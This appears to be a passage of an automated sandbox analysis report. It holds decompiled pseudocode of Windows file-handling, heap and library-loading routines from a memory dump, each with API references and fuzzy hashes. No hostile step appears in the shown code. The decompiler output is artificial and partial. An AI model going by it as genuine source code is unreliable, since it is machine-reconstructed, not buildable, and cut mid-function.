                				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
                				E00CA943C(_t78);
                				 *_t89 = 0xcd22e8;
                				 *((intOrPtr*)(_t91 - 4)) = 0;
                				E00CA5E99(_t89 + 0x1024, _t86, _t96);
                				 *((char*)(_t91 - 4)) = 1;
                				E00CAC4CA(_t89 + 0x20e8, _t86, _t96);
                				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
                				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
                				E00CA151B();
                				_t62 = E00CA151B();
                				 *((char*)(_t91 - 4)) = 4;
                				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
                				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
                				 *(_t89 + 0x21b8) = _t63;
                				_t98 = _t63;
                				if(_t63 == 0) {
                					_t64 =  *((intOrPtr*)(_t91 + 8));
                				} else {
                					_t74 = E00CBD82C(_t86, _t89, _t98, 0x82e8);
                					 *((intOrPtr*)(_t91 + 8)) = _t74;
                					 *((char*)(_t91 - 4)) = 5;
                					if(_t74 == 0) {
                						_t64 = 0;
                					} else {
                						_t64 = E00CAAD1B(_t74); // executed
                					}
                				}
                				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
                				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
                				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
                				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
                				 *((char*)(_t89 + 0x1d)) =  *((intOrPtr*)(_t64 + 0x6199));
                				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
                				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
                				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
                				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
                				 *((char*)(_t89 + 0x6cbc)) = 0;
                				 *((short*)(_t89 + 0x6cc4)) = 0;
                				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
                				E00CBE920(_t87, _t89 + 0x2208, 0, 0x40);
                				E00CBE920(_t87, _t89 + 0x2248, 0, 0x34);
                				E00CBE920(_t87, _t89 + 0x4590, 0, 0x20);
                				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
                				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
                				 *((short*)(_t89 + 0x6cfa)) = 0;
                				 *((char*)(_t89 + 0x6cd6)) = 0;
                				 *((char*)(_t89 + 0x6cf8)) = 0;
                				 *((char*)(_t89 + 0x21e0)) = 0;
                				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
                				return _t89;
                			}















                APIs
                • __EH_prolog.LIBCMT ref: 00CA1382
                  • Part of subcall function 00CA5E99: __EH_prolog.LIBCMT ref: 00CA5E9E
                  • Part of subcall function 00CAC4CA: __EH_prolog.LIBCMT ref: 00CAC4CF
                  • Part of subcall function 00CAC4CA: new.LIBCMT ref: 00CAC512
                  • Part of subcall function 00CAC4CA: new.LIBCMT ref: 00CAC536
                • new.LIBCMT ref: 00CA13FA
                  • Part of subcall function 00CAAD1B: __EH_prolog.LIBCMT ref: 00CAAD20
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 973bb902df1a6cfa21fdbf77ac71f670f490cc056da027e6c02b70e6bf843142
                • Instruction ID: 4f7c84b8b53e2eebfc170cbb5ff0d19310028d3a93e5d8a2413610809aa44a8f
                • Opcode Fuzzy Hash: 973bb902df1a6cfa21fdbf77ac71f670f490cc056da027e6c02b70e6bf843142
                • Instruction Fuzzy Hash: 7D4134B0805B409EE724DF798485AE7FBE5FF29314F544A2ED5EE83282CB326554CB21
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E00CCA6B2(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
                				char _v8;
                				char _v16;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				char _t31;
                				signed int _t36;
                				char _t40;
                				intOrPtr _t44;
                				char _t45;
                				signed int _t51;
                				void* _t64;
                				void* _t70;
                				signed int _t75;
                				void* _t81;
                
                				_t81 = __eflags;
                				_v8 = E00CC8516(__ebx, __ecx, __edx);
                				E00CCA7D1(__ebx, __ecx, __edx, _t81);
                				_t31 = E00CCA446(_t81, _a4);
                				_v16 = _t31;
                				_t57 =  *(_v8 + 0x48);
                				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
                					return 0;
                				}
                				_push(__ebx);
                				_t70 = E00CC7A8A(_t57, 0x220);
                				_t51 = __ebx | 0xffffffff;
                				__eflags = _t70;
                				if(__eflags == 0) {
                					L5:
                					_t75 = _t51;
                					goto L6;
                				} else {
                					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
                					 *_t70 =  *_t70 & 0x00000000; // executed
                					_t36 = E00CCA873(_t51, _t70,  *(_v8 + 0x48), __eflags, _v16, _t70); // executed
                					_t75 = _t36;
                					__eflags = _t75 - _t51;
                					if(_t75 != _t51) {
                						__eflags = _a8;
                						if(_a8 == 0) {
                							E00CC7847();
                						}
                						asm("lock xadd [eax], ebx");
                						__eflags = _t51 == 1;
                						if(_t51 == 1) {
                							_t45 = _v8;
                							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0xcddb20;
                							if( *((intOrPtr*)(_t45 + 0x48)) != 0xcddb20) {
                								E00CC7A50( *((intOrPtr*)(_t45 + 0x48)));
                							}
                						}
                						 *_t70 = 1;
                						_t64 = _t70;
                						_t70 = 0;
                						 *(_v8 + 0x48) = _t64;
                						_t40 = _v8;
                						__eflags =  *(_t40 + 0x350) & 0x00000002;
                						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
                							__eflags =  *0xcddda0 & 0x00000001;
                							if(( *0xcddda0 & 0x00000001) == 0) {
                								_v16 =  &_v8;
                								E00CCA31C(5,  &_v16);
                								__eflags = _a8;
                								if(_a8 != 0) {
                									_t44 =  *0xcddd40; // 0xf124e8
                									 *0xcdd814 = _t44;
                								}
                							}
                						}
                						L6:
                						E00CC7A50(_t70);
                						return _t75;
                					} else {
                						 *((intOrPtr*)(E00CC7ECC())) = 0x16;
                						goto L5;
                					}
                				}
                			}



















                APIs
                  • Part of subcall function 00CC8516: GetLastError.KERNEL32(?,00CE00E0,00CC3394,00CE00E0,?,?,00CC2E0F,?,?,00CE00E0), ref: 00CC851A
                  • Part of subcall function 00CC8516: _free.LIBCMT ref: 00CC854D
                  • Part of subcall function 00CC8516: SetLastError.KERNEL32(00000000,?,00CE00E0), ref: 00CC858E
                  • Part of subcall function 00CC8516: _abort.LIBCMT ref: 00CC8594
                  • Part of subcall function 00CCA7D1: _abort.LIBCMT ref: 00CCA803
                  • Part of subcall function 00CCA7D1: _free.LIBCMT ref: 00CCA837
                  • Part of subcall function 00CCA446: GetOEMCP.KERNEL32(00000000,?,?,00CCA6CF,?), ref: 00CCA471
                • _free.LIBCMT ref: 00CCA72A
                • _free.LIBCMT ref: 00CCA760
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: _free$ErrorLast_abort
                • String ID:
                • API String ID: 2991157371-0
                • Opcode ID: 5397ea4144bda139f0f61d0d828cec971b1dba53804ab4990e1579719823be78
                • Instruction ID: 867d82ca68e6f367e436e6fca829ef6e6555a30d3d066f1318917c14b728db91
                • Opcode Fuzzy Hash: 5397ea4144bda139f0f61d0d828cec971b1dba53804ab4990e1579719823be78
                • Instruction Fuzzy Hash: 0331B131904208AFDB10EBA9D849FADB7F5EF40328F25419EE5149B2A1EB719E40EB51
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00CA9528(void* __ecx, short _a4, WCHAR* _a4104, signed char _a4108) {
                				long _v0;
                				signed char _t34;
                				signed int _t36;
                				void* _t37;
                				signed char _t46;
                				struct _SECURITY_ATTRIBUTES* _t47;
                				long _t56;
                				void* _t59;
                				long _t63;
                
                				E00CBD940();
                				_t46 = _a4108;
                				_t34 = _t46 >> 0x00000001 & 0x00000001;
                				_t59 = __ecx;
                				if((_t46 & 0x00000010) != 0 ||  *((char*)(__ecx + 0x1d)) != 0) {
                					_t63 = 1;
                					__eflags = 1;
                				} else {
                					_t63 = 0;
                				}
                				 *(_t59 + 0x18) = _t46;
                				_v0 = ((0 | _t34 == 0x00000000) - 0x00000001 & 0x80000000) + 0xc0000000;
                				_t36 =  *(E00CAB927(_t34, _a4104)) & 0x0000ffff;
                				if(_t36 == 0x2e || _t36 == 0x20) {
                					if((_t46 & 0x00000020) != 0) {
                						goto L8;
                					} else {
                						 *(_t59 + 4) =  *(_t59 + 4) | 0xffffffff;
                						_t47 = 0;
                						_t56 = _v0;
                					}
                				} else {
                					L8:
                					_t56 = _v0;
                					_t47 = 0;
                					__eflags = 0;
                					_t37 = CreateFileW(_a4104, _t56, _t63, 0, 2, 0, 0); // executed
                					 *(_t59 + 4) = _t37;
                				}
                				if( *(_t59 + 4) == 0xffffffff && E00CAB32C(_a4104,  &_a4, 0x800) != 0) {
                					 *(_t59 + 4) = CreateFileW( &_a4, _t56, _t63, _t47, 2, _t47, _t47);
                				}
                				 *((char*)(_t59 + 0x12)) = 1;
                				 *(_t59 + 0xc) = _t47;
                				 *(_t59 + 0x10) = _t47;
                				return E00CAFAB1(_t59 + 0x1e, _a4104, 0x800) & 0xffffff00 |  *(_t59 + 4) != 0xffffffff;
                			}













                APIs
                • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00CA9BF3,?,?,00CA76AC), ref: 00CA95B0
                • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00CA9BF3,?,?,00CA76AC), ref: 00CA95E5
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: e64291cb3cdf032bed96a965aa76ef8ef731e82cfefcb748b172e54e93654605
                • Instruction ID: 9522c67ca0ea4abe62734ed117134d1b393c2747a659a897d25352587547ca39
                • Opcode Fuzzy Hash: e64291cb3cdf032bed96a965aa76ef8ef731e82cfefcb748b172e54e93654605
                • Instruction Fuzzy Hash: E821F6B1804749AFE7318F54C847BA777E8EB4A368F004A2DF5E5821D2C374AD499A61
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 84%
                			E00CA9A7E(void* __ecx, void* __esi, signed char _a4, signed int* _a8, signed int* _a12) {
                				void* _v8;
                				void* _v16;
                				void* _v24;
                				signed char _v25;
                				int _t34;
                				signed char _t49;
                				signed int* _t51;
                				signed char _t57;
                				void* _t58;
                				void* _t59;
                				signed int* _t60;
                				signed int* _t62;
                
                				_t59 = __esi;
                				_t58 = __ecx;
                				if( *(__ecx + 0x18) != 0x100 && ( *(__ecx + 0x18) & 0x00000002) == 0) {
                					FlushFileBuffers( *(__ecx + 4));
                				}
                				_t51 = _a4;
                				_t49 = 1;
                				if(_t51 == 0 || ( *_t51 | _t51[1]) == 0) {
                					_t57 = 0;
                				} else {
                					_t57 = 1;
                				}
                				_push(_t59);
                				_t60 = _a8;
                				_v25 = _t57;
                				if(_t60 == 0) {
                					L9:
                					_a4 = 0;
                				} else {
                					_a4 = _t49;
                					if(( *_t60 | _t60[1]) == 0) {
                						goto L9;
                					}
                				}
                				_t62 = _a12;
                				if(_t62 == 0 || ( *_t62 | _a4) == 0) {
                					_t49 = 0;
                				}
                				if(_t57 != 0) {
                					E00CB082F(_t51, _t57,  &_v24);
                				}
                				if(_a4 != 0) {
                					E00CB082F(_t60, _t57,  &_v8);
                				}
                				if(_t49 != 0) {
                					E00CB082F(_t62, _t57,  &_v16);
                				}
                				asm("sbb eax, eax");
                				asm("sbb eax, eax");
                				asm("sbb eax, eax");
                				_t34 = SetFileTime( *(_t58 + 4),  ~(_a4 & 0x000000ff) &  &_v8,  ~(_t49 & 0x000000ff) &  &_v16,  ~(_v25 & 0x000000ff) &  &_v24); // executed
                				return _t34;
                			}
















                APIs
                • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,00CA738C,?,?,?), ref: 00CA9A98
                • SetFileTime.KERNELBASE(?,?,?,?), ref: 00CA9B48
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: File$BuffersFlushTime
                • String ID:
                • API String ID: 1392018926-0
                • Opcode ID: 22bdfb8776be9a05740655c5f8ce263496b6bd97a5ad911515a934540f9324c5
                • Instruction ID: 69797643a435746ffcc4fbcc3f4858daf42ccea5fed1bb62a2cc896b6180bcaf
                • Opcode Fuzzy Hash: 22bdfb8776be9a05740655c5f8ce263496b6bd97a5ad911515a934540f9324c5
                • Instruction Fuzzy Hash: 1B21E731148346AFC711DF24D492AABBBE4EF52708F04091EB891C7141D735EE08E7A1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E00CC9990(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
                				struct HINSTANCE__* _t13;
                				signed int* _t20;
                				signed int _t27;
                				signed int _t28;
                				signed int _t29;
                				signed int _t33;
                				intOrPtr* _t34;
                
                				_t20 = 0xd007b8 + _a4 * 4;
                				_t27 =  *0xcdd668; // 0x814d2927
                				_t29 = _t28 | 0xffffffff;
                				_t33 = _t27 ^  *_t20;
                				asm("ror esi, cl");
                				if(_t33 == _t29) {
                					L14:
                					return 0;
                				}
                				if(_t33 == 0) {
                					_t34 = _a12;
                					if(_t34 == _a16) {
                						L7:
                						_t13 = 0;
                						L8:
                						if(_t13 == 0) {
                							L13:
                							_push(0x20);
                							asm("ror edi, cl");
                							 *_t20 = _t29 ^ _t27;
                							goto L14;
                						}
                						_t33 = GetProcAddress(_t13, _a8);
                						if(_t33 == 0) {
                							_t27 =  *0xcdd668; // 0x814d2927
                							goto L13;
                						}
                						 *_t20 = E00CBDB10(_t33);
                						goto L2;
                					} else {
                						goto L4;
                					}
                					while(1) {
                						L4:
                						_t13 = E00CC9A2C( *_t34); // executed
                						if(_t13 != 0) {
                							break;
                						}
                						_t34 = _t34 + 4;
                						if(_t34 != _a16) {
                							continue;
                						}
                						_t27 =  *0xcdd668; // 0x814d2927
                						goto L7;
                					}
                					_t27 =  *0xcdd668; // 0x814d2927
                					goto L8;
                				}
                				L2:
                				return _t33;
                			}











                APIs
                • GetProcAddress.KERNEL32(00000000,?), ref: 00CC99F0
                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00CC99FD
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: AddressProc__crt_fast_encode_pointer
                • String ID:
                • API String ID: 2279764990-0
                • Opcode ID: 41a5516cc2a12e6df11a87e0488fdee0080741bb0502cd556bdee62a266c19ab
                • Instruction ID: 38514650e37a71a5a2029de1f63e52fc7388f8b0914498a74eac09b3d0ebbb07
                • Opcode Fuzzy Hash: 41a5516cc2a12e6df11a87e0488fdee0080741bb0502cd556bdee62a266c19ab
                • Instruction Fuzzy Hash: EE110633E016219B9F21DE29DC44F9A73A5EB807207164669FC2DEB284DA30ED02D6D1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E00CA9B57() {
                				long _v4;
                				void* __ecx;
                				void* __ebp;
                				long _t12;
                				signed int _t14;
                				signed int _t21;
                				signed int _t22;
                				void* _t23;
                				long _t32;
                				void* _t34;
                
                				_t34 = _t23;
                				_t22 = _t21 | 0xffffffff;
                				if( *(_t34 + 4) != _t22) {
                					L3:
                					_v4 = _v4 & 0x00000000;
                					_t12 = SetFilePointer( *(_t34 + 4), 0,  &_v4, 1); // executed
                					_t32 = _t12;
                					if(_t32 != _t22 || GetLastError() == 0) {
                						L7:
                						asm("cdq");
                						_t14 = 0 + _t32;
                						asm("adc edx, 0x0");
                						goto L8;
                					} else {
                						if( *((char*)(_t34 + 0x14)) == 0) {
                							_t14 = _t22;
                							L8:
                							return _t14;
                						}
                						E00CA6DE2(0xce00e0, 0xce00e0, _t34 + 0x1e);
                						goto L7;
                					}
                				}
                				if( *((char*)(_t34 + 0x14)) == 0) {
                					return _t22;
                				}
                				E00CA6DE2(0xce00e0, 0xce00e0, _t34 + 0x1e);
                				goto L3;
                			}














                APIs
                • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00CA9B8D
                • GetLastError.KERNEL32 ref: 00CA9B99
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: ErrorFileLastPointer
                • String ID:
                • API String ID: 2976181284-0
                • Opcode ID: b3fa844246c1f1a2ccd446ad51eabdbf19349d29b9a92d508e0cb6283688a8bb
                • Instruction ID: 9e160d9d434c71e7fd139332724943b9892a8ec984321532270aac3cd94bcc7c
                • Opcode Fuzzy Hash: b3fa844246c1f1a2ccd446ad51eabdbf19349d29b9a92d508e0cb6283688a8bb
                • Instruction Fuzzy Hash: 6001B5717012016BDB349E29FC85B6BB7DAEB86319F14453EB152C36C0CA74DD08C671
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 94%
                			E00CA9903(intOrPtr* __ecx, long _a4, long _a8, long _a12) {
                				long _t14;
                				void* _t17;
                				intOrPtr* _t19;
                				long _t21;
                				void* _t23;
                				long _t25;
                				long _t28;
                				long _t31;
                
                				_t19 = __ecx;
                				if( *((intOrPtr*)(__ecx + 4)) == 0xffffffff) {
                					L13:
                					return 1;
                				}
                				_t28 = _a4;
                				_t25 = _a8;
                				_t31 = _t25;
                				if(_t31 > 0 || _t31 >= 0 && _t28 >= 0) {
                					_t21 = _a12;
                				} else {
                					_t21 = _a12;
                					if(_t21 != 0) {
                						if(_t21 != 1) {
                							_t17 = E00CA96E1(_t23);
                						} else {
                							_t17 =  *((intOrPtr*)( *_t19 + 0x14))();
                						}
                						_t28 = _t28 + _t17;
                						asm("adc edi, edx");
                						_t21 = 0;
                					}
                				}
                				_a12 = _t25;
                				_t14 = SetFilePointer( *(_t19 + 4), _t28,  &_a12, _t21); // executed
                				if(_t14 != 0xffffffff || GetLastError() == 0) {
                					goto L13;
                				} else {
                					return 0;
                				}
                			}

                APIs
                • SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 00CA9957
                • GetLastError.KERNEL32 ref: 00CA9964
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                Similarity
                • API ID: ErrorFileLastPointer
                • String ID:
                • API String ID: 2976181284-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 96%
                			E00CC7B78(void* __ecx, void* __edx, void* _a4, long _a8) {
                				void* __esi;
                				void* _t4;
                				long _t7;
                				void* _t9;
                				void* _t13;
                				void* _t14;
                				long _t16;
                
                				_t13 = __edx;
                				_t10 = __ecx;
                				_t14 = _a4;
                				if(_t14 != 0) {
                					_t16 = _a8;
                					__eflags = _t16;
                					if(_t16 != 0) {
                						__eflags = _t16 - 0xffffffe0;
                						if(_t16 <= 0xffffffe0) {
                							while(1) {
                								_t4 = RtlReAllocateHeap( *0xd00874, 0, _t14, _t16); // executed
                								__eflags = _t4;
                								if(_t4 != 0) {
                									break;
                								}
                								__eflags = E00CC7906();
                								if(__eflags == 0) {
                									goto L5;
                								}
                								_t7 = E00CC6763(_t10, _t13, _t16, __eflags, _t16);
                								_pop(_t10);
                								__eflags = _t7;
                								if(_t7 == 0) {
                									goto L5;
                								}
                							}
                							L7:
                							return _t4;
                						}
                						L5:
                						 *((intOrPtr*)(E00CC7ECC())) = 0xc;
                						L6:
                						_t4 = 0;
                						__eflags = 0;
                						goto L7;
                					}
                					E00CC7A50(_t14);
                					goto L6;
                				}
                				_t9 = E00CC7A8A(__ecx, _a8); // executed
                				return _t9;
                			}

                APIs
                • _free.LIBCMT ref: 00CC7B99
                  • Part of subcall function 00CC7A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CC2FA6,?,0000015D,?,?,?,?,00CC4482,000000FF,00000000,?,?), ref: 00CC7ABC
                • RtlReAllocateHeap.NTDLL(00000000,?,?,?,?,00CE00E0,00CACB18,?,?,?,?,?,?), ref: 00CC7BD5
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                Similarity
                • API ID: AllocateHeap$_free
                • String ID:
                • API String ID: 1482568997-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00CB0574(void* __ecx) {
                				long _v8;
                				long _v12;
                				int _t8;
                				void* _t14;
                				signed int _t15;
                				signed int _t17;
                
                				_t8 = GetProcessAffinityMask(GetCurrentProcess(),  &_v8,  &_v12); // executed
                				if(_t8 == 0) {
                					return _t8 + 1;
                				}
                				_t14 = 0;
                				_t17 = _v8;
                				_t15 = 1;
                				do {
                					if((_t17 & _t15) != 0) {
                						_t14 = _t14 + 1;
                					}
                					_t15 = _t15 + _t15;
                				} while (_t15 != 0);
                				if(_t14 >= 1) {
                					return _t14;
                				}
                				return 1;
                			}

                APIs
                • GetCurrentProcess.KERNEL32(?,?), ref: 00CB0581
                • GetProcessAffinityMask.KERNEL32(00000000), ref: 00CB0588
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                Similarity
                • API ID: Process$AffinityCurrentMask
                • String ID:
                • API String ID: 1231390398-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 82%
                			E00CAA12F(WCHAR* _a4, long _a8) {
                				short _v4100;
                				int _t12;
                				signed int _t18;
                				signed int _t19;
                
                				E00CBD940();
                				_push(_t18);
                				_t12 = SetFileAttributesW(_a4, _a8); // executed
                				_t19 = _t18 & 0xffffff00 | _t12 != 0x00000000;
                				if(_t19 == 0 && E00CAB32C(_a4,  &_v4100, 0x800) != 0) {
                					_t19 = _t19 & 0xffffff00 | SetFileAttributesW( &_v4100, _a8) != 0x00000000;
                				}
                				return _t19;
                			}

                APIs
                • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CA9F65,?,?,?,00CA9DFE,?,00000001,00000000,?,?), ref: 00CAA143
                • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CA9F65,?,?,?,00CA9DFE,?,00000001,00000000,?,?), ref: 00CAA174
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                Similarity
                • API ID: ItemText_swprintf
                • String ID:
                • API String ID: 3011073432-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 82%
                			E00CA9E18(WCHAR* _a4) {
                				short _v4100;
                				int _t10;
                				signed int _t16;
                				signed int _t17;
                
                				E00CBD940();
                				_push(_t16);
                				_t10 = DeleteFileW(_a4); // executed
                				_t17 = _t16 & 0xffffff00 | _t10 != 0x00000000;
                				if(_t17 == 0 && E00CAB32C(_a4,  &_v4100, 0x800) != 0) {
                					_t17 = _t17 & 0xffffff00 | DeleteFileW( &_v4100) != 0x00000000;
                				}
                				return _t17;
                			}

                APIs
                • DeleteFileW.KERNELBASE(?,?,?,00CA9648,?,?,00CA94A3), ref: 00CA9E29
                • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00CA9648,?,?,00CA94A3), ref: 00CA9E57
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                Similarity
                • API ID: DeleteFile
                • String ID:
                • API String ID: 4033686569-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00CA9E7F(WCHAR* _a4) {
                				short _v4100;
                				long _t6;
                				long _t11;
                				long _t13;
                
                				E00CBD940();
                				_t6 = GetFileAttributesW(_a4); // executed
                				_t13 = _t6;
                				if(_t13 == 0xffffffff && E00CAB32C(_a4,  &_v4100, 0x800) != 0) {
                					_t11 = GetFileAttributesW( &_v4100); // executed
                					_t13 = _t11;
                				}
                				return _t13;
                			}

                APIs
                • GetFileAttributesW.KERNELBASE(?,?,?,00CA9E74,?,00CA74F7,?,?,?,?), ref: 00CA9E90
                • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00CA9E74,?,00CA74F7,?,?,?,?), ref: 00CA9EBC
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00CAFCFD(intOrPtr _a4) {
                				short _v4100;
                				struct HINSTANCE__* _t7;
                
                				E00CBD940();
                				_t7 = GetSystemDirectoryW( &_v4100, 0x800);
                				if(_t7 != 0) {
                					E00CAB625( &_v4100, _a4,  &_v4100, 0x800);
                					_t7 = LoadLibraryW( &_v4100); // executed
                				}
                				return _t7;
                			}

                APIs
                • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CAFD18
                • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CAE7F6,Crypt32.dll,?,00CAE878,?,00CAE85C,?,?,?,?), ref: 00CAFD3A
                Memory Dump Source
